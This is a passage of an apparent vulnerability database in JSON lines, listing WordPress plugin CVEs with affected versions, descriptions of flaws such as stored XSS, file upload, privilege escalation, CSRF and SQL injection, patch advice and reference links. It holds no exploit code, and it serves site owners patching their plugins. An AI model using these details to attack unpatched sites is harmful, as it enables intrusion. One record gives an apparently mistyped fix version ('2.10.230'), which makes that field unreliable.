version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fa7b1a-9137-4049-a20a-8eb6df7ca578?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fa7b1a-9137-4049-a20a-8eb6df7ca578?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3054266\\\/tourfic\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3054266\\\/tourfic\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10788","slug":"aryo-activity-log","versionImpact":"2.11.1","versionEndExcluding":"2.11.2","description":"The Activity Log \u2013 Monitor & Record User Changes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the event parameters in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.","recommendation":"Update to version 2.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75324bf1-a00e-4da7-8d42-d224c39ceb79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75324bf1-a00e-4da7-8d42-d224c39ceb79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12853","slug":"modula-best-grid-gallery","versionImpact":"2.11.10","versionEndExcluding":"2.11.11","description":"The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the zip upload functionality in all versions up to, and including, 2.11.10. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.11.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218127%40modula-best-grid-gallery&new=3218127%40modula-best-grid-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218127%40modula-best-grid-gallery&new=3218127%40modula-best-grid-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef86b1f2-d5aa-4e83-a792-5fa35734b3d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef86b1f2-d5aa-4e83-a792-5fa35734b3d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1282","slug":"drag-n-drop-upload-cf7-pro","versionEndExcluding":"2.11.1","description":"The Drag and Drop Multiple File Upload PRO - Contact Form 7 Standard WordPress plugin before 2.11.1 and Drag and Drop Multiple File Upload PRO - Contact Form 7 with Remote Storage Integrations WordPress plugin before 5.0.6.4 do not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b2617f-5235-4587-9eaf-d0f6bb23dc27\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b2617f-5235-4587-9eaf-d0f6bb23dc27\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9548c5-59ea-46b0-bfa5-a0f7a259351a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9548c5-59ea-46b0-bfa5-a0f7a259351a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0593","slug":"simple-job-board","versionEndExcluding":"2.11.0","description":"The Simple Job Board plugin for WordPress is vulnerable to unauthorized access of data| due to insufficient authorization checking on the fetch_quick_job() function in all versions up to, and including, 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038476\\\/simple-job-board\\\/trunk\\\/includes\\\/class-simple-job-board-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038476\\\/simple-job-board\\\/trunk\\\/includes\\\/class-simple-job-board-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8667","slug":"hurrytimer","versionImpact":"2.10.0","versionEndExcluding":"2.11.0","description":"The HurryTimer \u2013 An Scarcity and Urgency Countdown Timer for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized post publication due to a missing capability check on the activateCampaign() function in all versions up to, and including, 2.10.0. This makes it possible for authenticated attackers, with contributor-level access and above, to publish arbitrary posts like ones they have submitted for review, or a site administrator has in draft.","recommendation":"Update to version 2.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a8eda88-c45a-4867-b427-d63b586e6de3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a8eda88-c45a-4867-b427-d63b586e6de3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php#L568\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php#L568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173213\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173213\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2484","slug":"themeisle-companion","versionImpact":"2.10.34","versionEndExcluding":"2.10.35","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Services and Post Type Grid widgets in all versions up to, and including, 2.10.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd0f172-2cd3-4839-9df9-64475554d3b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd0f172-2cd3-4839-9df9-64475554d3b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/services.php#L639\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/services.php#L639\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/posts-grid.php#L1464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/posts-grid.php#L1464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055876%40themeisle-companion&new=3055876%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055876%40themeisle-companion&new=3055876%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058970%40themeisle-companion&new=3058970%40themeisle-companion&sfp_email=&sfph_mail=#file16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058970%40themeisle-companion&new=3058970%40themeisle-companion&sfp_email=&sfph_mail=#file16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1323","slug":"themeisle-companion","versionImpact":"2.10.31","versionEndExcluding":"2.10.32","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Type Grid Widget Title in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040304\\\/themeisle-companion\\\/tags\\\/2.10.32\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/class-elementor-extra-widgets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040304\\\/themeisle-companion\\\/tags\\\/2.10.32\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/class-elementor-extra-widgets.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1499","slug":"themeisle-companion","versionImpact":"2.10.30","versionEndExcluding":"2.10.31","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Table widget in the  $settings['title_tags'] parameter in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df40eb21-2080-4de5-9055-09246a8a275e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df40eb21-2080-4de5-9055-09246a8a275e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1037\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1037\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1229","slug":"simpleshop-cz","versionImpact":"2.10.2","versionEndExcluding":"2.10.3","description":"The SimpleShop plugin for WordPress is vulnerable to unauthorized disconnection from SimpleShop due to a missing capability check on the maybe_disconnect_simpleshop function in all versions up to, and including, 2.10.2. This makes it possible for unauthenticated attackers to disconnect the SimpleShop.","recommendation":"Update to version 2.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080151%40simpleshop-cz&new=3080151%40simpleshop-cz&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080151%40simpleshop-cz&new=3080151%40simpleshop-cz&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc39c47-3b99-4e43-b25d-a025f3d228b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc39c47-3b99-4e43-b25d-a025f3d228b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1162","slug":"themeisle-companion","versionImpact":"2.10.29","versionEndExcluding":"2.10.29","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.29. This is due to missing or incorrect nonce validation on the register_reference() function. This makes it possible for unauthenticated attackers  to update the connected API keys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.10.230, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0508","slug":"themeisle-companion","versionImpact":"2.10.27","versionEndExcluding":"2.10.28","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1010\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1019\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1019\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021959\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021959\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6781","slug":"themeisle-companion","versionImpact":"2.10.26","versionEndExcluding":"2.10.27","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, and including, 2.10.26 due to insufficient input sanitization and output escaping on user supplied values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e39019-c322-4027-84f2-faabd9ca4983?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e39019-c322-4027-84f2-faabd9ca4983?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L315\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L315\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3011567%40themeisle-companion%2Ftrunk&old=2991564%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3011567%40themeisle-companion%2Ftrunk&old=2991564%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2287","slug":"themeisle-companion","versionEndExcluding":"2.10.24","description":"The Orbit Fox by ThemeIsle WordPress plugin before 2.10.24 does not limit URLs which may be used for the stock photo import feature, allowing the user to specify arbitrary URLs. This leads to a server-side request forgery as the user may force the server to access any URL of their choosing.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b36a184-2138-4a65-8940-07e7764669bb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b36a184-2138-4a65-8940-07e7764669bb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9416","slug":"modula-best-grid-gallery","versionImpact":"2.10.1","versionEndExcluding":"2.10.2","description":"The Modula Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions <= 5.0.36) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160235\\\/modula-best-grid-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160235\\\/modula-best-grid-gallery\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1954040c-2188-48b7-9f21-9a0c851c9165?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1954040c-2188-48b7-9f21-9a0c851c9165?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1640","slug":"bit-form","versionImpact":"2.10.1","versionEndExcluding":"2.10.2","description":"The Contact Form Builder Plugin: Multi Step Contact Form, Payment Form, Custom Contact Form Plugin by Bit Form plugin for WordPress is vulnerable to unauthorized modification of data due to a insufficient user validation on the bitforms_update_form_entry AJAX action in all versions up to, and including, 2.10.1. This makes it possible for unauthenticated attackers to modify form submissions.","recommendation":"Update to version 2.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048523\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/Ajax\\\/FrontendAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048523\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/Ajax\\\/FrontendAjax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3668","slug":"powerpack-elements","versionImpact":"2.10.17","versionEndExcluding":"2.10.18","description":"The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator.","recommendation":"Update to version 2.10.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249ccc77-0daf-41bc-b5c5-991bf17d645d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249ccc77-0daf-41bc-b5c5-991bf17d645d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/powerpackelements.com\\\/change-logs\\\/\",\"name\":\"https:\\\/\\\/powerpackelements.com\\\/change-logs\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1230","slug":"simpleshop-cz","versionImpact":"2.10.0","versionEndExcluding":"2.10.1","description":"The SimpleShop plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.0. This is due to missing or incorrect nonce validation on the maybe_disconnect_simpleshop function. This makes it possible for unauthenticated attackers to disconnect the site from simpleshop via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9870db7f-0c8e-44a4-aa0f-13709d773756?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9870db7f-0c8e-44a4-aa0f-13709d773756?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/redbitcz\\\/simpleshop-wp-plugin\\\/commit\\\/8b04c95bb29036658e6a5b1ef735440646e3199b\",\"name\":\"https:\\\/\\\/github.com\\\/redbitcz\\\/simpleshop-wp-plugin\\\/commit\\\/8b04c95bb29036658e6a5b1ef735440646e3199b\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4939","slug":"wc-multivendor-membership","versionEndExcluding":"2.10.1","description":"THe WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0870de2d-bca5-4d57-a07f-877a416ce0d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0870de2d-bca5-4d57-a07f-877a416ce0d5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12276","slug":"ultimate-member","versionImpact":"2.9.2","versionEndExcluding":"2.10.0","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to second-order SQL Injection via filenames in all versions up to, and including, 2.9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with  access to upload files and manage filenames through a third-party plugin like a File Manager, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The risk of this vulnerability is very minimal as it requires a user to be able to manipulate filenames in order to successfully exploit.","recommendation":"Update to version 2.10.0, or a newer patched 